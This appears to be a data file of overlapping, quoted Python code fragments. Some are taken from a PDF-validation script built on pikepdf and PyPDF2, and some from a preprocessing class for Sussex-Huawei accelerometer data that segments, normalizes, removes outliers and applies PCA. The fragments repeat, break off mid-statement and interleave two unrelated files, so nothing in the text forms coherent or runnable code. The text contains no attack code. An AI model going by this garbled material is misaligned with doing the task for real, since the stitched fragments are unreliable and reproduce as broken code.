isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj)", "dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try:", "%s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK,", "#checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as", "excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # #", "if \"pdf\" not in output: # return False # except Exception as e:", "as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception", "= PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1]", "checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir,", "#print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e:", "includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for", "# print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info]", "# except Exception as e: # return False # else: # return True", "= getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports", "pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\"", "isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile", "#print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK = \"True\" return", "else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', '']", "(isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') #", "def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName)", "# #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified:", "open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\"", "= [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except", "len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO'", "if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] = 'NO'", "isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData", "pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] = 'NO' else:", "pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData =", "= \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath)", "pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages))", "try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0:", "= downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ',", "<filename>app/imr/scrapyard.py import pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info", "#meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check,", "HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): #", "# #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' % (name,", "<= 0: raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1]", "#print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__':", "['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath)", "try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if", "'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <=", "28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length:", "', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() #", "\"pdf\" not in output: # return False # except Exception as e: #", "[] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status)", "\"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK = \"True\"", "= 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages", "#print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return", "#meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: #", "checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200", "5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly;", "Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' %", "= 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader", "mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items():", "HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s'", "import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( #", "= pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0:", "os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData", "if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] =", "'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader =", "fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData =", "# else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData = []", "checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta =", "output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False", "#print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try:", "\"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n", "status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e:", "= os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status", "pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages", "#print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0]", "raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] =", "2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection:", "SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value", "bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/;", "#checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status)", "meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as", "return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir,", "'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1]))" ]
[ "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in", ":param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None for", "mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes", "of a data set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise", "data = (data - data.min()) / (data.max() - data.min()) # to center around", "= data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)):", "DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os", "= pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "= encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate =", "(data[columns] - data[columns].mean()) / data[columns].std() else: mean = data.mean() std = data.std() data", "# 2. Split by non-subsequent indices # Source for next 3 lines after", "None for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else:", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] data_train", "data set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides", "< 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7", "self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data(", "= data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False)", "@overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based", "columns = None, mean = None, std = None): \"\"\" Apply z-normalization to", "data_segments = [] for target_label in args: selected_data = data[data[label_column] == target_label] #", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self,", "unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq)", "via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test =", "data[columns] = (data[columns] - mean) / std else: data = (data - mean)", "@overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply", "column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] =", "data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode ==", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment", "columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "= self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "#data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments =", "valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len)", "road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time')", "replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode", "\"\"\" try: if data is None or target_columns is None or mode is", "# https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] =", "None): \"\"\" Apply z-normalization to a data set. :param data: :param columns: :param", "or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns,", "ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7 lines of code", "= data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "date time. :param data: :param column: :param unit: :return: \"\"\" # Source: #", "unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data: :param", "an encoding function. :param data: :param mode: :param columns: :param encoding_function: :return: \"\"\"", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns)", "replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz", "Remove segments that are too long or too short after splitting min_length_subsegements =", "or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is", "that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\"", "if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None):", "#Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment", "data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to", "replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS Fresh", "# 1. Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]'))", "os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data.", "data.std() elif mean is not None and std is not None: if columns", ":param axis: :return: \"\"\" try: data = None for ind in range(len(data_segments)): if", "# https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name})", "reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names =", "label. :param data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is", "#**(1/2) alternative old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0:", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config,", "data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments", "selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile", "data set. :param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try:", "in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate", "data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode == 'orientation':", "print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time',", "ind, column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode", "data = (data - data.mean()) / data.std() elif mean is not None and", "pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides", "isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode ==", "data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data))", "preprocessing steps necessary for inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame,", "!= len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "# to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError):", "is None: if columns is not None: mean = data[columns].mean() std = data[columns].std()", "self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train, data_test, data_valid", ":param target_columns: :param mode: :param args: :return: \"\"\" try: if data is None", "pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns =", "Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for", "_, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode", "\"\"\" try: if data is None or replacement_mode is None or columns is", "pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index)", "pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns)", "DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\"", "columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list)", "next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns:", "if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns", "is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column]", "#3. Remove segments that are too long or too short after splitting min_length_subsegements", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines", ")[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train,", "'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label']", "Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in", "else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is", "self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0]", "\"\"\" Project accelerometer data from local vehicle coordinates to a global coordinate system.", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None,", "1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for", "index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data =", "are too long or too short after splitting min_length_subsegements = [] for segment", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in", "def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set. :param", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data with desired", "return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "== 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "mode, label_column=None, args=None): \"\"\" Segements a time series based on a label column,", "a dimensionality reduction technique to a data set. :param data: :param mode: :param", "print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train =", "target_label] # 2. Split by non-subsequent indices # Source for next 3 lines", "data with desired label value data_segments = [] for target_label in args: selected_data", "label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test,", "columns, quantile = None, threshold = None): \"\"\" Removes outlieres either based on", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data", ":param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0],", "data is None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise", "reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str)", "str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8", "= None, std = None): \"\"\" Apply z-normalization to a data set. :param", "@0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test", "# https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_,", "label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels',", "in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for", "around 0.0 substract 0.5 else: data = (data - data.min()) / (data.max() -", "def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns = ['acceleration_abs', 'road_label', 'id'] #", "if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise 